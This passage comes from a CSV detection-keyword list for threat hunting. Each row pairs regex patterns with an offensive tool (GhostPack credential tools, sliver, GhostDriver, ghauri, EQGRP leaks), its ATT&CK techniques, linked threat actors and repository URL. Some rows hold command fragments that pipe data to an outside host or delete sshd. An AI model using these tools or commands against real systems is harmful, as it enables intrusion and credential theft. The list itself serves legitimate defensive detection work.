advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46368" "*ghauri.common.payloads*",".{0,1000}ghauri\.common\.payloads.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46369" "*ghauri.common.session*",".{0,1000}ghauri\.common\.session.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46370" "*ghauri.common.utils*",".{0,1000}ghauri\.common\.utils.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46371" "*ghauri.core.extract*",".{0,1000}ghauri\.core\.extract.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46372" 
"*ghauri.core.tests*",".{0,1000}ghauri\.core\.tests.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46373" "*ghauri.extractor.advance*",".{0,1000}ghauri\.extractor\.advance.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46374" "*ghauri.py *",".{0,1000}ghauri\.py\s.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46375" "*ghauri_extractor*",".{0,1000}ghauri_extractor.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46376" "*ghauri-main.zip*",".{0,1000}ghauri\-main\.zip.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability 
Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","46377" "*ghcr.io/picosh/pico/*",".{0,1000}ghcr\.io\/picosh\/pico\/.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","46381" "*ghost_* -v*",".{0,1000}ghost_.{0,1000}\s\-v.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","46382" "*ghost_sparc*",".{0,1000}ghost_sparc.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","46383" "*ghost_x86*",".{0,1000}ghost_x86.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","46384" "*ghost01.hwtxt*",".{0,1000}ghost01\.hwtxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","46385" "*GhostDriver.exe *",".{0,1000}GhostDriver\.exe\s.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","46386" "*GhostDriver-main.zip*",".{0,1000}GhostDriver\-main\.zip.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","46387" "*GhostInTheNet off*",".{0,1000}GhostInTheNet\soff.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a 
Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","46388" "*GhostInTheNet on*",".{0,1000}GhostInTheNet\son.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","46389" "*GhostInTheNet.sh *",".{0,1000}GhostInTheNet\.sh\s.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","46390" "*GhostMapper-main.*",".{0,1000}GhostMapper\-main\..{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","46391" "*GhostPack*",".{0,1000}GhostPack.{0,1000}","offensive_tool_keyword","GhostPack","A collection of security related toolsets.with known hacktools","T1055 - T1203 - T1218 - T1560","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/GhostPack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46392" 
"*GhostPack/ForgeCert*",".{0,1000}GhostPack\/ForgeCert.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","46393" "*GhostPack/KeeThief*",".{0,1000}GhostPack\/KeeThief.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46394" "*GhostPack/Koh*",".{0,1000}GhostPack\/Koh.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - 
APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","1","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","46395" "*GhostPack/Lockless*",".{0,1000}GhostPack\/Lockless.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","1","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","46396" "*GhostPack/Rubeus*",".{0,1000}GhostPack\/Rubeus.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","46397" "*GhostPack/Rubeus*",".{0,1000}GhostPack\/Rubeus.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","46398" "*GhostPack/SafetyKatz*",".{0,1000}GhostPack\/SafetyKatz.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","46399" "*GhostPack/Seatbelt*",".{0,1000}GhostPack\/Seatbelt.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","46400" "*GhostPack/SharpDPAPI*",".{0,1000}GhostPack\/SharpDPAPI.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","46401" "*GhostPack/SharpDump*",".{0,1000}GhostPack\/SharpDump.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","1","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","46402" "*GhostPack/SharpUp*",".{0,1000}GhostPack\/SharpUp.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","46403" "*Ghostpack-CompiledBinaries*",".{0,1000}Ghostpack\-CompiledBinaries.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation tool","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","N/A","10","1313","237","2024-10-24T21:58:54Z","2018-07-25T23:38:15Z","46404" "*ghostsocks-local*",".{0,1000}ghostsocks\-local.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","46405" "*ghostsocks-server*",".{0,1000}ghostsocks\-server.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","46406" "*GhostTask.exe*",".{0,1000}GhostTask\.exe.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","46407" "*GhostTask-1.0.zip*",".{0,1000}GhostTask\-1\.0\.zip.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","46408" "*GhostWebShell.cs*",".{0,1000}GhostWebShell\.cs.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","46409" "*gianlucaborello/libprocesshider*",".{0,1000}gianlucaborello\/libprocesshider.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","1","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","46410" "*GILLES Lionel aka topotam 
(@topotam77)*",".{0,1000}GILLES\sLionel\saka\stopotam\s\(\@topotam77\).{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","46411" "*gimmecredz*",".{0,1000}gimmecredz.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","46412" "*ginuerzh/gost*",".{0,1000}ginuerzh\/gost.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","1","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46414" "*Gioyik/getExploit*",".{0,1000}Gioyik\/getExploit.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. 
but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Gioyik/getExploit","1","1","#linux","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z","46415" "*gist.github.com/byt3bl33d3r/19a48fff8fdc34cc1dd1f1d2807e1b7f*",".{0,1000}gist\.github\.com\/byt3bl33d3r\/19a48fff8fdc34cc1dd1f1d2807e1b7f.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","46416" "*git clone * /tmp/cheetah*",".{0,1000}git\sclone\s.{0,1000}\s\/tmp\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","46417" "*git diff | ssh pastes.sh changes.patch*",".{0,1000}git\sdiff\s\|\sssh\spastes\.sh\schanges\.patch.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#linux","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","46418" "*git log -p | scanrepo *",".{0,1000}git\slog\s\-p\s\|\sscanrepo\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46419" "*git reset eb88d07c43afe407094e7d609248d85a15e148ef --hard* rm -f sshd*",".{0,1000}git\sreset\seb88d07c43afe407094e7d609248d85a15e148ef\s\-\-hard.{0,1000}\srm\s\-f\ssshd.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mechanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP)","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","46420" "*github*/COMHunter/*",".{0,1000}github.{0,1000}\/COMHunter\/.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","46421" "*github*/DeathStar*",".{0,1000}github.{0,1000}\/DeathStar.{0,1000}","offensive_tool_keyword","DeathStar","DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.","T1078 - T1059 - T1047 - T1018 - T1069","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/byt3bl33d3r/DeathStar","1","0","N/A","N/A","N/A","10","1607","331","2024-01-23T10:24:34Z","2017-05-21T07:34:57Z","46422" "*github*/dropper.git*",".{0,1000}github.{0,1000}\/dropper\.git.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 -
TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","N/A","10","","N/A","","","","46423" "*github*/MoveKit.git*",".{0,1000}github.{0,1000}\/MoveKit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","46424" "*github*/Mr-xn/*",".{0,1000}github.{0,1000}\/Mr\-xn\/.{0,1000}","offensive_tool_keyword","spring-core-rce","github user infosec hosting exploitation tools","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","N/A","1","50","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z","46425" "*github*/padre.git*",".{0,1000}github.{0,1000}\/padre\.git.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","1","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","46426"
"*github.com/*Reaper.exe*",".{0,1000}github\.com\/.{0,1000}Reaper\.exe.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","46431" "*github.com/bishopfox/*",".{0,1000}github\.com\/bishopfox\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","46432" "*github.com/g3tsyst3m*",".{0,1000}github\.com\/g3tsyst3m.{0,1000}","offensive_tool_keyword","elevationstation","github user hosting multiple exploitation tools","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","46433" 